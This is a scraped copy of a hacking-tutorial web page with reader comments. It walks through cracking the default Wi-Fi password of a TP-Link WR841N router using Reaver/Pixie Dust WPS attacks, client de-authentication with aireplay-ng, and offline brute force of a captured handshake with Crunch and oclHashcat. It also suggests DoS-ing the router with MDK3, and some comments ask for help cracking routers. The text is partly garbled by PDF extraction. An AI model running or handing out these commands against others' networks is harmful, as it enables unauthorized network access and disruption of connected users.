14/9/2017 How to hack a TP link WR841N router wireless network

TRENDING Metasploitable 3: Exploiting HTTP PUT Search...

Intercambio al extranjero
Hacking Tutorials La mejor forma de estudiar ingls. Elige entre 6 pases angloparlantes
kaplaninternational.com/Intercambio

HOME ABOUT US GENERAL WIRELESS WEB SCANNING METASPLOIT HACKING COURSES MORE CONTACT

YOU ARE AT: Home Wi Hacking Tutorials How to hack a TP link WR841N router wireless network

TOP TUTORIALS

BY HACKING TUTORIALS JULY 16, 2015

13
The Top 10 Wi Hacking Tools in
Kali Linux

BY HACKING TUTORIALS
MARCH 17, 2016 34
Installing VPN on Kali Linux 2016
Rolling

BY HACKING TUTORIALS MAY 1, 2016

11
Metasploit commands

How to hack a TP link WR841N router wireless network 13

BY HACKING TUTORIALS MAY 24, 2015

13
BY HACKING TUTORIALS ON MAY 24, 2015 WIFI HACKING TUTORIALS
How to hack a TP link WR841N
router wireless network
In this tutorial we will show you how to hack a TP link WR841N router wireless network with the default wi
password using Kali Linux. TP Link routers use the default WPS PIN as wi password out of the box Which
BY HACKING TUTORIALS MAY 24, 2015
consists of 8 characters. We will try the following techniques to hack a TP link WR841N router wireless 21
network: Pixie Dust Attack WPS in Kali Linux
with Reaver

1. First we try to get the password using Reaver 1.5.2 with Pixiedust WPS and the Aircrack-ng suite.
2. Than we try to get the WPS PIN using Reaver. BY HACKING TUTORIALS JUNE 3, 2015
12
3. The last method is capturing a 4-way handshake using Airodump-ng, generate a default password list with Crunch
How to hack a WordPress website
and bruteforce it with oclHashcat.
with WPScan

1. Pixie Dust WPS Attack with Reaver

Lets put the wi interface in monitoring mode using:

airmon-ng start wlan0

For anyone getting the following errorin Kali Linux 2.0 Sana:

[X] ERROR: Failed to open wlan0mon for capturing

try this as a solution:

1. Put the device in Monitor mode Airmon-ng start wlan0

2. A monitoring interface will be started on wlan0mon
3. Use iwcon g to check if the interface MODE is in managed mode, if so then change it to monitor instead of
managed with the following commands:
SUBSCRIBE
ifcon g wlan0mon down
iwcon g wlan0mon mode monitor
ifconwebsite
This g wlan0mon up
uses cookies to improve your experience. By continuing use of this website we assume you're ok with our cookie policy and disclaimer. Read More

http://www.hackingtutorials.org/wifi-hacking-tutorials/how-to-hack-a-tp-link-wr841n-router-wireless-network/ 1/9
14/9/2017 How to hack a TP link WR841N router wireless network
4. iwcon g check if the mode is monitoring mode now Enter your email address to subscribe to Hacking
Tutorials and receive noti cations of new tutorials by
5. airodump-ng wlan0mon
email.

If necessary kill the processes Kali is complaining about:

Email Address

Subscribe

RECENT TUTORIALS

Metasploitable 3: Exploiting HTTP PUT

How to bypass authentication on Windows Server

2008 R2

Metasploitable 3: Exploiting ManageEngine Desktop

Central 9

Book Review: Advanced Penetration Testing

How to setup Metasploitable 3 on Windows 10

Start airodump-ng to get the BSSID, MAC address and channel of our target.
VIRTUAL HACKING LABS

airodump-ng -i wlan0mon

Now pick your target and use the BSSID and the channel for Reaver:

Reaver -i wlan0mon -b [BSSID] -vv -S -c [AP channel]

We need the PKE, PKR, e-hash 1&2, E/R-nonce and the authkey from Reaver to use for pixiewps.

Ads by Google

1.Download Hack Password WiFi

2.TP Link Router

Now start pixiewps with the following arguments: 3.Password Router

4.Find Password

CATEGORIES

Digital Forensics

Exploit tutorials

General Tutorials

Hacking Courses

This website uses cookies to improve your experience. By continuing use of this website we assume you're ok with our cookie policy
Infosec and disclaimer.
Books Read More

http://www.hackingtutorials.org/wifi-hacking-tutorials/how-to-hack-a-tp-link-wr841n-router-wireless-network/ 2/9
14/9/2017 How to hack a TP link WR841N router wireless network

Malware Analysis Tutorials

Metasploit Tutorials

Networking

Scanning Tutorials

Web Applications

Wi Hacking Tutorials

DOWNLOADS

directory_scanner.py (8556 downloads)

Components:
PEiD Userdb (7248 downloads)
E-Hash1 is a hash in which we brute force the rst half of the PIN.
E-Hash2 is a hash in which we brute force the second half of the PIN. PEiD-0.95-20081103.zip (9518 downloads)
HMAC is a function that hashes all the data in parenthesis. The function is HMAC-SHA-256.
wi _jammer.py (12601 downloads)
PSK1 is the rst half of the routers PIN (10,000 possibilities)
PSK2 is the second half of the routers PIN (1,000 or 10,000 possibilities depending if we want to compute the
checksum. We just do 10,000 because it makes no time di erence and its just easier.)
PKE is the Public Key of the Enrollee (used to verify the legitimacy of a WPS exchange and prevent replays.)
PKR is the Public Key of the Registrar (used to verify the legitimacy of a WPS exchange and prevent replays.)

This router is not vulnerable to Pixie Dust WPS Attack.

2. Reaver WPS PIN Attack

Lets try to hack this router using Reaver. Start Reaver with 5 seconds delay and imitating a win7 PC:

reaver -i wlan0mon -b [BSSID] -vv -c 1 -d 5 -w

Unfortunately the routers AP rate limiting kicks in and locks itself after 6 attempts and has to be unlocked manually.
As an alternative you can try to DOS the router with MDK3 to force a reboot which also unlocks the router.

3. Brute forcing the router with oclHashcat

Lets see if we can get the password by capturing a 4-way handshake and an o ine bruteforce attack with a default
router password list. We will be using the following tools:

This website uses cookies to improve your experience. By continuing use of this website we assume you're ok with our cookie policy and disclaimer. Read More

http://www.hackingtutorials.org/wifi-hacking-tutorials/how-to-hack-a-tp-link-wr841n-router-wireless-network/ 3/9
14/9/2017 How to hack a TP link WR841N router wireless network
1. Crunch to generate the password list.
2. Airodump-ng to capture the 4-way handshake.
3. airplay-ng to force de-auth connected clients.
4. oclHashcat GPU on Windows.

Lets start Crunch with the following command:

crunch 8 8 1234567890 -o /root/Desktop/88numlist.txt

This might take a little while, the result is a 900 MB wordlist containing all possible combinations of 8 digits. This
wordlist will hack a TP link WR841N router wireless network with 100% certainty.

Lets capture the handshake with Airodump-ng and Aireplay-ng and start Airodump-ng to nd our target with the
following command:
airodump-ng wlan0mon

Now pick your targets BSSID and channel and restart Airodump-ng with the following command and look for a
connected client:

airodump-ng --bssid [BSSID] -c [channel]-w [ lepath to store .cap]wlan0mon

Now de-auth the connected client using Aireplay-ng in a new terminal.

aireplay-ng -0 2 -a [BSSID] -c [Client MAC] wlan0mon

De-auth succesful and the 4 way handshake is captured!

Step 3: Bruteforce with default router password list

Well use oclHashcat GPU on Windows to crack the WiFi password using the passwordlist we created earlier.

We have to convert the .cap le to a .hccap rst using the following command:

aircrack-ng -J [Filepath to save .hccap le] [Filepath to .cap le]

[embedyt]http://www.youtube.com/watch?v=WFncxKlmw2A&width=500&height=350[/embedyt]
Start oclHashcat on Windows using the following command:

oclhashcat64.exe -m 2500 -w 3 --[gpu-temp-retain=60] --status -o cracked.txt tplink.hccap 88numlist.txt

Note: --gpu-temp-retain is AMD only.

Wait a little while for this result:

This is how to hack a TP link WR841N router wireless network with 100% certainty.

ThisHow to uses
website hack a TPtolink
cookies router
improve WR841N
your wireless
experience. network
By continuing use of(Pixie Dustwe
this website WPS attack,
assume you'reRe
ok with our cookie policy and disclaimer. Read More

http://www.hackingtutorials.org/wifi-hacking-tutorials/how-to-hack-a-tp-link-wr841n-router-wireless-network/ 4/9
14/9/2017 How to hack a TP link WR841N router wireless network

In the next video we will use this router to demonstrate a MiTM attack and the Evil Twin Wireless AP.

Thanks for watching and please subscribe to my YouTube channel for more hacking tutorials :)

If you want to read more about hacking TP Link routers have a look at this new tutorial:

If youre interested in learning more about WiFi hacking and wireless in general, you can follow any of these online
courses:

Online Hacking Courses

Learn Wi- Hacking/Penetration Testing From Scratch

This course contains 50 Videos to learn practical attacks to test the security of Wi- and wired networks from
scratch
This usinguses
website Linux. Read more
cookies to improve your experience. By continuing use of this website we assume you're ok with our cookie policy and disclaimer. Read More

http://www.hackingtutorials.org/wifi-hacking-tutorials/how-to-hack-a-tp-link-wr841n-router-wireless-network/ 5/9
14/9/2017 How to hack a TP link WR841N router wireless network

ARP spoo ng & Man In The Middle Attacks Execution & Detection

Learn practical attacks to test the security of clients connected to a network and how to protect against these
attacks. Read more

Share on:

Tweet Share 191 Share 4 6 submit Email

SHARE.

PREVIOUS ARTICLE NEXT ARTICLE

Pixie Dust Attack WPS in Kali Linux with Open Port Scanning and OS Detection with
Reaver Nmap in Kali Linux

RELATED POSTS

BY HACKING TUTORIALS BY HACKING TUTORIALS

BY HACKING TUTORIALS
DECEMBER 24, 2015 0 NOVEMBER 28, 2015 0
FEBRUARY 12, 2016 0
Piping Crunch with Aircrack-ng Bypass MAC ltering on
TP Link Archer C5 Router
wireless networks
Hacking

13 COMMENTS

This website HACKING TUTORIALS

uses cookies on AUGUST
to improve 14, 2015 8:17
your experience. ByAM
continuing use of this website we assume you're ok with our cookie policy and disclaimer. Read More

http://www.hackingtutorials.org/wifi-hacking-tutorials/how-to-hack-a-tp-link-wr841n-router-wireless-network/ 6/9
14/9/2017 How to hack a TP link WR841N router wireless network
For anyone getting the following error:

[X] ERROR: Failed to open wlan0mon for capturing

try this as a solution:

1. Put the device in Monitor mode Airmon-ng start wlan0

2. A monitoring interface will be started on wlan0mon
3. Use iwcon g to check if the interface MODE is in managed mode, if so then change it to monitor
instead of managed with the following commands:
ifcon g wlan0mon down
iwcon g wlan0mon mode monitor
ifcon g wlan0mon up
4. iwcon g check if the mode is monitoring mode now
5. airodump-ng wlan0mon

REPLY

FANTASIO on NOVEMBER 1, 2015 2:44 PM

hi,
i think this command [airmon-ng check kill] better than kill xxxx.
this command kill any proccess used our wireless adaptor

cheshmak.

REPLY

USAMA KHAN on NOVEMBER 24, 2015 7:28 AM

Tp-link

REPLY

IQBAL on DECEMBER 21, 2015 5:10 AM

How to hack TP link router on I phone

REPLY

HACKING TUTORIALS on DECEMBER 31, 2015 9:23 AM

Im not sure that is possible from an iPhone, you better go with rooted Android devices.

REPLY

YAGYA on JANUARY 16, 2016 4:45 AM

Tried with TL-WRN841N router at home.

1. pixiedust could not nd pin,
2. AP locks after 6 attempts and is locked for more than 12 hrs. Invulnerable to mdk3 a ood attack.
3. The password is changed. only numbers will not work.

REPLY

DDS on FEBRUARY 1, 2016 5:17 AM

Using WPS pin as Wi password is a really bad practice.

You only need to crack rst 7 digits since 8th digit a WPS checksum.
Thats just 10 million possible passwords.
Such password can be cracked in a few minutes using a modern PC or even less with a GPU.
What worries me is that TP-Link continues to use WPS PIN as password even on their current router
models.

REPLY

XYXX on NOVEMBER 1, 2016 3:41 PM

This website uses cookies to improve your experience. By continuing use of this website we assume you're ok with our cookie policy and disclaimer. Read More

http://www.hackingtutorials.org/wifi-hacking-tutorials/how-to-hack-a-tp-link-wr841n-router-wireless-network/ 7/9
14/9/2017 How to hack a TP link WR841N router wireless network
im newbie in wi cracking but i need to grab or to generate that 10 milion wps pin list. can
someone help ? crunch 8 8 0123456789 isnt an option since my cracking speed is 1000
keys/s and 100 milion keys is time consuming.

REPLY

PRITESH on APRIL 17, 2016 5:07 PM

I have already rooted android give me the wps pin to crack Tp-link. I dont no WPS pin of TP-link.

REPLY

JOEL on SEPTEMBER 7, 2016 1:42 PM

How to Hack TP link routers User name and Password without WiFi only connected through cable

REPLY
Accept

ZEDORG on NOVEMBER 23, 2016 5:54 PM

crunch 8 8 1234567890 -o /root/Desktop/88numlist.txt

this method take 10 times what you need

beacause the result are not all valid pins

im looking for a wordlist generator to produce only valid pins

which means
crunch 7 7 1234567890 -o /root/Desktop/88numlist.txt
but add the checksum at the end of each line

i found a pin generator made by a spanish guy but the pin starting with 0 are missing and i have a tp
link extender with such pin and password

anyone knows a complete valid pins generator please

REPLY

XYXX on DECEMBER 14, 2016 11:11 PM

Could you share a link of that generator ?

REPLY

ZEDORG on AUGUST 4, 2017 2:29 AM

sorry i wasnt around this website for so long

the program is in spanish called Pin-generador, you can nd it here:
inforprograma.net/pagina-articulos.php?page_id1=4

REPLY

LEAVE A REPLY

Your Comment

Your Name

Your Email
This website uses cookies to improve your experience. By continuing use of this website we assume you're ok with our cookie policy and disclaimer. Read More

http://www.hackingtutorials.org/wifi-hacking-tutorials/how-to-hack-a-tp-link-wr841n-router-wireless-network/ 8/9
14/9/2017 How to hack a TP link WR841N router wireless network

Your Website

POST COMMENT

Notify me of follow-up comments by email.

Notify me of new posts by email.

RECENT TUTORIALS POPULAR TUTORIALS FEATURED DOWNLOADS

Metasploitable 3: Exploiting HTTP PUT BY HACKING TUTORIALS directory_scanner.py (8556 downloads)

SEPTEMBER 1, 2016 105

How to bypass authentication on Windows Server Review: Offensive Security Certi ed PEiD Userdb (7248 downloads)
Professional (OSCP)
2008 R2
PEiD-0.95-20081103.zip (9518 downloads)
Metasploitable 3: Exploiting ManageEngine Desktop BY HACKING TUTORIALS APRIL 18, 2017
37 wi _jammer.py (12601 downloads)
Central 9
Exploiting Eternalblue for shell with
Book Review: Advanced Penetration Testing Empire & Msfconsole

How to setup Metasploitable 3 on Windows 10

BY HACKING TUTORIALS MARCH 17, 2016
34
Course: The Virtual Hacking Labs
Installing VPN on Kali Linux 2016
Rolling

Hacking Tutorials 2017

This website uses cookies to improve your experience. By continuing use of this website we assume you're ok with our cookie policy and disclaimer. Read More

http://www.hackingtutorials.org/wifi-hacking-tutorials/how-to-hack-a-tp-link-wr841n-router-wireless-network/ 9/9